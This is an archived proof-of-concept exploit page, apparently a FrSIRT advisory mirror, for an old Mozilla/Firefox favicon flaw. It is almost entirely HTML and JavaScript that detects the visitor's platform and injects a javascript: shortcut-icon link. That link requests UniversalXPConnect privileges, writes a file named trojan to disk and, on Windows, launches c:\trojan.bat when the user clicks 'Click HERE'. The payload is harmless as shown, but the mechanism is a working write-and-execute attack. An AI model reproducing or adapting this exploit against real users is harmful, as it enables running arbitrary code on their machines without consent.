home *** CD-ROM | disk | FTP | other *** search
- // FrSIRT Comment : If a user clicks on a link, this code will create and
- // launch the file c:\trojan.bat (on Windows).
- // On Linux and Mac OS X this code will create the file ~/trojan or /trojan
-
- <html>
- <head>
- <link rel="SHORTCUT ICON" href="favicon.ico">
- <script language="JavaScript" type="text/javascript">
- var pf = navigator.platform.toLowerCase();
- if (pf.indexOf("win") != -1) {
- var os = "win";
- } else if (pf.indexOf("mac") != -1) {
- var os = "mac";
- } else {
- var os = "linux"
- }
- function runDemo() {
- // this is an ugly caching workaround
- document.getElementById('outhtml').innerHTML = "";
- document.getElementById('outhtml').innerHTML +=
- document.getElementById('clearhtml').value
- document.getElementById('outhtml').innerHTML +=
- document.getElementById('clearhtml').value
- document.getElementById('outhtml').innerHTML +=
- document.getElementById('clearhtml').value
- window.setTimeout("document.getElementById('outhtml').innerHTML +=
- document.getElementById('linkhtml_"+os+"').value",300);
- }
- </script>
- </head>
- <body>
-
- <div id="outhtml" style="display:none"></div>
-
- <textarea id="clearhtml" style="display:none">
- <link rel="SHORTCUT ICON" href="favicon.ico">
- </textarea>
-
- <textarea id="linkhtml_win" style="display:none">
- <link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow
- ('javascript:netscape.security.PrivilegeManager.enablePrivilege
- (\'UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\']
- .createInstance(Components.interfaces.nsILocalFile);
- file.initWithPath(\'c:\\\\trojan.bat\');file.createUnique(Components.interfaces.nsIFile
- .NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/
- network/file-output-stream;1\'].createInstance(Components.interfaces.nsIFile
- OutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO
- OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE\\n:END\';outputStream.write(output,
- output.length);outputStream.close();file.launch();','','')">
- </textarea>
-
- <textarea id="linkhtml_mac" style="display:none">
- <link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:
- netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');
- file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components
- .interfaces.nsILocalFile);file.initWithPath(\'/trojan\');file.createUnique(Components
- .interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes
- [\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces
- .nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);
- output=\'trojan!\';outputStream.write(output,output.length);outputStream.close();','','')">
- </textarea>
-
- <textarea id="linkhtml_linux" style="display:none">
- <link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:netscape
- .security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components
- .classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);
- file.initWithPath(\'~/trojan\');file.createUnique(Components.interfaces.nsIFile
- .NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
- file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
- outputStream.init(file,0x04|0x08|0x20,420,0);output=\'trojan!\';outputStream.
- write(output,output.length);outputStream.close();','','')">
- </textarea><br>
- <a href="#" onclick="runDemo();runDemo();">Click HERE</a>
- </div>
- </body>
- </html>
-
- Integration
-
